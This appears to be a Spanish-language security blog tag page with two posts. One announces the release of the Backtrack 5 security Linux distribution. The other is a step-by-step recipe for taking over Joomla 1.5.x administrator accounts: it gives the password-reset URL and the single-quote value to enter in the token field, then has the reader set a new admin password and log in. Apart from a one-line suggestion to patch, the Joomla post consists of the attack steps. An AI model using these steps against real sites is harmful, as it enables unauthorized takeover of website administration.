Posts Tagged ‘ information security ’

Vulnerabilidad en Joomla 1.5 – Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

Vulnerabilidad que permite el cambio de la contraseña de administrador, en pocos simples pasos:

1. Ir a la url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Escribir en el campo “token” el siguiente caracter: ‘ y dar click en SUBMIT

3. Escribir el nuevo password para admin

Bingo!!
4. Ir a la url del sitio : target.com/administrator/
5. Loguearse como admin con el nuevo password
Conclusión: la de siempre, parchar y mantener actualizado su Joomla, o en su defecto cambiar por otras alternativas XD
Saludos
Fuente:

Backtrack 5 disponible ya para la descarga

A partir del Martes 10 de Mayo el equipo de Offensive Security ya ha puesto ha disposición la tan esperada versión 5 de Backtrack, la distribución GNU/Linux  de seguridad informática, a la cual han denominado “Revolución”.

Backtrack 5 Revolucion

Backtrack 5 Revolucion

Esta versión incluye actualizaciones de los programas, así como la inclusión de algunos otros, las herramientas organizadas y categorizadas. Se puede descargar desde este link, y presenta gran variedad para su descarga, es decir, para usuarios que prefieren KDE o GNOME, de 32 y 64 bits.

Si la seguridad informática es tu campo, no tardes en probar esta excelente distribución!!!